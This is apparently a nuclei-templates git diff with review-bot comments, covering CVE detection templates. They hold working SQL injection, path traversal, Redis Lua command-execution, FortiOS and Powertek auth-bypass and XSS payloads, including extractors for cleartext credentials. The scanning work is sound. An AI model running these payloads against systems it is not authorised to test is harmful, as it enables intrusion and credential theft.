@@ -0,0 +1,44 @@ +id: CVE-2022-32024 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32024 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml deleted file mode 100644 index fb24e14552..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml +++ /dev/null 
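Review bot: `/booking.php` is requested after an admin login and the template is tagged `authenticated`, yet nothing in the description says that page requires a session; if it is publicly reachable, the login step and the tag only make the check fail when no credentials are supplied, and a one-line comment stating which it is would settle it. The sibling CVE-2022-32028 template in this commit sets `redirects: true` and `max-redirects: 2` on the same login flow while this one does not, so the two will behave differently when the application answers the login with a redirect. The `comment:` line under `metadata` describes an alternative the template does not use; if it is kept as operator information, mark it as such, otherwise it reads as stale.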
@@ -1,46 +0,0 @@ -id: CVE-2022-32025 -info: - name: Car Rental Management System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32025 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated -variables: - num: "999999999" -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}%23&password={{password}} - - | - GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - skip-variables-check: true - redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml new file mode 100644 index 0000000000..6afb4dca59 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml 
@@ -0,0 +1,46 @@ +id: CVE-2022-32028 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-32159.yaml b/nuclei-templates/CVE-2022/CVE-2022-32159.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-32159.yaml rename to nuclei-templates/CVE-2022/CVE-2022-32159.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml new file mode 100644 index 0000000000..aec3372d91 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml 
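Review bot: `skip-variables-check: true` suppresses the engine's check that `{{username}}` and `{{password}}` were supplied, so a run without credentials posts the literal placeholders to `/admin/ajax.php?action=login` and reports nothing instead of an error; a header comment such as `# requires username/password to be supplied as template variables` would make the dependency visible (CVE-2022-32024 above has the same flag). The `metadata.comment` line is duplicated verbatim from CVE-2022-32024; keep it in one place rather than copying it into every template for this product.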
@@ -0,0 +1,31 @@ +id: CVE-2022-32409 +info: + name: i3geo - Directory Traversal + author: pikpikcu + severity: critical + description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-94 + metadata: + shodan-query: http.html:"i3geo" + verified: "true" + tags: cve,cve2022,i3geo,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32444.yaml b/nuclei-templates/CVE-2022/CVE-2022-32444.yaml deleted file mode 100644 index 1460ae469c..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32444.yaml +++ /dev/null 
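Review bot: The name `i3geo - Directory Traversal` and the `lfi` tag describe a file read, but `cwe-id: CWE-94`, the description's "execute arbitrary PHP code" and the `I:H/A:H` vector describe code injection, while the request itself only reads `/etc/passwd`; pick one classification (CWE-22 if the template is meant to detect the traversal, as the sibling LFI templates here do) and make name, tag and CWE agree. The regex `root:[x*]:0:0` uses a character class that accepts only `x` or `*` in the password field, unlike the `root:.*:0:0:` pattern every other LFI template in this commit uses; the stricter form misses layouts that keep a hash in that field, and the inconsistency is worth removing. The `?&pagina=` path also has a stray leading `&`.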
@@ -1,30 +0,0 @@ -id: CVE-2022-32444 - -info: - name: u5cms v8.3.5 - Open Redirect - author: 0x_Akoko - severity: medium - description: | - u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. - reference: - - https://github.com/u5cms/u5cms/issues/50 - - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-32444 - cwe-id: CWE-601 - tags: cve,cve2022,redirect,u5cms,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/loginsave.php?u=http://interact.sh' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by cs 05/30/2022 diff --git a/nuclei-templates/CVE-2022/CVE-2022-33174.yaml b/nuclei-templates/CVE-2022/CVE-2022-33174.yaml new file mode 100644 index 0000000000..26dd8298df --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-33174.yaml 
@@ -0,0 +1,41 @@ +id: CVE-2022-33174 +info: + name: Powertek Firmware - Authorization Bypass + author: pikpikcu + severity: high + description: | + Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allows remote authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + reference: + - https://gynvael.coldwind.pl/?lang=en&id=748 + - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-33174 + cwe-id: CWE-863 + metadata: + shodan-query: http.html:"Powertek" + verified: "true" + tags: cve,cve2022,powertek,auth-bypass +requests: + - raw: + - | + GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 + Host: {{Hostname}} + Cookie: tmpToken=; + matchers-condition: and + matchers: + - type: word + words: + - '<sys.passwd>' + - '<sys.su.name>' + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' + - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' diff --git a/nuclei-templates/CVE-2022/CVE-2022-34049.yaml b/nuclei-templates/CVE-2022/CVE-2022-34049.yaml deleted file mode 100644 index 6a78378e04..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-34049.yaml +++ /dev/null 
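Review bot: The extractor writes the device's cleartext administrator username and password into scan output; the `<sys.passwd>` / `<sys.su.name>` word matchers already prove the bypass, so either justify the extraction in a comment or drop it, and make clear to whoever runs the template that its result files will contain credentials. The second extractor regex `<sys\.su\.name>([a-z]+)<\/sys\.su\.name>` captures only lowercase letters, so a username with digits, uppercase or punctuation silently yields no extraction even though the first pattern uses `[A-Z0-9a-z]+`; the two should share one character class.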
@@ -1,41 +0,0 @@ -id: CVE-2022-34049 -info: - name: Wavlink Exportlogs.sh - Configuration Exposure - author: For3stCo1d - severity: medium - description: | - An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data. - reference: - - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 - - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing - - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-34049 - cwe-id: CWE-552 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,wavlink,router,exposure -requests: - - raw: - - | - GET /cgi-bin/ExportLogs.sh HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Login' - - 'Password' - condition: and - - type: word - part: header - words: - - filename="sysLogs.txt" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml new file mode 100644 index 0000000000..d782414f0d --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2022-35416 +info: + name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS + author: 0x240x23elu + severity: medium + description: | + H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. + reference: + - https://github.com/advisories/GHSA-9x76-78gc-r3m9 + - https://github.com/Docker-droid/H3C_SSL_VPN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-35416 + cwe-id: CWE-79 + metadata: + shodan-query: http.html_hash:510586239 + verified: "true" + tags: cve,cve2022,xss,vpn,h3c +requests: + - raw: + - | + GET /wnm/login/login.json HTTP/1.1 + Host: {{Hostname}} + Cookie: svpnlang=<script>alert('document.domain')</script> + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<script>alert('document.domain')</script>" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-40684.yaml b/nuclei-templates/CVE-2022/CVE-2022-40684.yaml deleted file mode 100644 index f2ede7984e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-40684.yaml +++ /dev/null 
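Review bot: The description `allows wnm/login/login.json svpnlang cookie XSS` does not say that the injection point is a cookie, which an attacker cannot set in another user's browser without a second weakness; that precondition is the main factor in reading this `medium`, so a line such as `# reflection is from the svpnlang cookie; without a way to set that cookie for a victim this is largely self-XSS` belongs in the description or a comment. The quoted `alert('document.domain')` makes the marker a literal string rather than an evaluated expression, which is fine for a reflection check, but a comment saying so would forestall a well-meaning "fix".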
@@ -1,28 +0,0 @@ -id: CVE-2022-40684 - -info: - name: FortiOS Authentication Bypass - author: Shockwave - severity: Critical - description: An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy and FortiSwitchManager may allow an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests. - reference: - - https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/ - - tags: authentication bypass - -requests: - - raw: - - | - PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}} - User-Agent: Report Runner - Content-Type: application/json - Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; - Content-Length: 610 - { - "ssh-public-key1": "fake-key" - } - matchers: - - type: word - words: - - 'Invalid SSH public key.\' diff --git a/nuclei-templates/CVE-2022/cve-2022-0165.yaml b/nuclei-templates/CVE-2022/cve-2022-0165.yaml new file mode 100644 index 0000000000..9c67da252a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0165.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2022-0165 + +info: + name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect + author: akincibor + severity: high + description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + reference: + - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb + - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2022-0165 + cwe-id: CWE-601 + tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-0201.yaml b/nuclei-templates/CVE-2022/cve-2022-0201.yaml deleted file mode 100644 index b69da0b65f..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0201.yaml +++ /dev/null 
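Review bot: File naming is inconsistent across this commit: this template and the `cve-2022-0543.yaml` / `cve-2022-0595.yaml` hunks below are added lowercase, the rename hunks move `cve-2022-29303.yaml` and `cve-2022-32159.yaml` to uppercase, and another rename moves `CVE-2022-0381.yaml` to lowercase; settle on one case (the directory itself is `CVE-2022/`) so the same template is not carried twice on case-insensitive filesystems. `cvss-score: 8.80` is written with a trailing zero where every other template uses one decimal (`8.8`), and a `C:H/I:H/A:H` vector on an open redirect is worth re-checking against the NVD entry before it is copied further.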
@@ -1,38 +0,0 @@ -id: CVE-2022-0201 - -info: - name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting - author: Akincibor - severity: medium - description: | - WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. - reference: - - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 - - https://plugins.trac.wordpress.org/changeset/2656512 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0201 - cwe-id: CWE-79 - tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<img src onerror=alert(/XSS/)>' - - 'pm_query' - condition: and - - - type: word - part: header - words: - - text/html - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0288.yaml b/nuclei-templates/CVE-2022/cve-2022-0288.yaml deleted file mode 100644 index 16085e702d..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0288.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: CVE-2022-0288 - -info: - name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: | - WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. - reference: - - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 - remediation: Fixed in version 2.7.12 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0288 - cwe-id: CWE-79 - tags: wordpress,xss,wpscan,cve,cve2022 - -requests: - - method: POST - path: - - "{{BaseURL}}" - - headers: - Content-Type: "application/x-www-form-urlencoded" - - body: | - html_element_selection=</script><img+src+onerror=alert(document.domain)> - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "</script><img src onerror=alert(document.domain)>" - - "ad-inserter" - condition: and - - - type: word - part: header - words: - - "text/html" - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0381.yaml b/nuclei-templates/CVE-2022/cve-2022-0381.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0381.yaml rename to nuclei-templates/CVE-2022/cve-2022-0381.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-0543.yaml b/nuclei-templates/CVE-2022/cve-2022-0543.yaml new file mode 100644 index 0000000000..d26e91ee2f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0543.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2022-0543 + +info: + name: Redis Sandbox Escape - Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The + vulnerability was introduced by Debian and Ubuntu Redis packages that + insufficiently sanitized the Lua environment. The maintainers failed to + disable the package interface, allowing attackers to load arbitrary libraries. + reference: + - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce + - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis + - https://bugs.debian.org/1005787 + - https://www.debian.org/security/2022/dsa-5081 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2022-0543 + metadata: + shodan-query: redis_version + tags: cve,cve2022,network,redis,unauth,rce,kev + +network: + - inputs: + - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:6379" + read-size: 64 + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0595.yaml b/nuclei-templates/CVE-2022/cve-2022-0595.yaml new file mode 100644 index 0000000000..85f16ad2ee --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0595.yaml 
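Review bot: The `data` payload loads the hard-coded `/usr/lib/x86_64-linux-gnu/liblua5.1.so.0` and then runs `cat /etc/passwd` on the target, so this template executes a command on the host and a negative result only shows that path was absent (non-amd64 Debian/Ubuntu or a different Lua build), not that the instance is patched; a comment such as `# executes a command on the target; library path is the amd64 Debian/Ubuntu layout, other layouts give a false negative` records both facts. Because it runs code on the target, `intrusive` should join the `rce,unauth,kev` tags so operators who exclude intrusive checks skip it. `classification` also lacks a `cwe-id`, unlike the other templates in this commit.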
@@ -0,0 +1,57 @@ +id: CVE-2022-0595 + +info: + name: WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting + author: akincibor + severity: medium + description: | + WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action. + reference: + - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de + - https://plugins.trac.wordpress.org/changeset/2686614 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0595 + cwe-id: CWE-79 + tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161 + + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="size_limit" + + 10485760 + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="action" + + dnd_codedropz_upload + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="type" + + click + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.svg" + Content-Type: image/jpeg + + <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> + -----------------------------92633278134516118923780781161-- + + - | + GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "alert(document.domain)")' + - 'status_code_2 == 200' + condition: and + +# Enhanced by md on 2022/09/08 
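Review bot: The `cvss-metrics` vector says `PR:L` while `description` and the `unauth` tag say the upload needs no authentication; the two disagree and should be reconciled against the wpscan reference. `info.name` attributes the bug to Contact Form 7 itself, whereas the description names the Drag and Drop Multiple File Upload add-on, so the name should read something like `name: WordPress Drag and Drop Multiple File Upload - Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting`. The uploaded `{{randstr}}.svg` remains under `wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/` after the second request; the `intrusive` tag is present, but a comment such as `# leaves an SVG under wp_dndcf7_uploads/wpcf7-files/ that must be removed after the scan` would make the cleanup obligation explicit.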
diff --git a/nuclei-templates/CVE-2022/cve-2022-0599.yaml b/nuclei-templates/CVE-2022/cve-2022-0599.yaml deleted file mode 100644 index b1a73d1aa8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0599.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-0599 - -info: - name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting - author: scent2d - severity: medium - description: | - WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. - reference: - - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ - - https://nvd.nist.gov/vuln/detail/cve-2022-0599 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0599 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="><svg/onload=alert(document.domain)> HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'id="mmursp_id" value="\"><svg/onload=alert(document.domain)>" />' - - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - condition: and - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0653.yaml b/nuclei-templates/CVE-2022/cve-2022-0653.yaml deleted file mode 100644 index 97a429face..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0653.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2022-0653 - -info: - name: Wordpress Profile Builder Plugin Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: | - The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 - - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ - - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail= - remediation: Upgrade to version 3.6.5 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0653 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<a href="javascript:alert(document.domain);">here</a>' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0660.yaml b/nuclei-templates/CVE-2022/cve-2022-0660.yaml deleted file mode 100644 index 9cdc808f6e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0660.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: CVE-2022-0660 - -info: - name: Microweber < 1.2.11 - Information Disclosure - author: amit-jd - severity: high - description: | - Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11. - reference: - - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/ - - https://github.com/advisories/GHSA-hhrj-wp42-32v3 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 - - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-0660 - cwe-id: CWE-209 - metadata: - verified: "true" - tags: cve2022,microweber,disclosure,authenticated,huntr,cve - -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - POST /module/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:comments - - class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}} - - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - contains(body_2,'QueryException') - - contains(body_2,'SQLSTATE') - - contains(body_2,'runQueryCallback') - - 'contains(all_headers_2,"text/html")' - 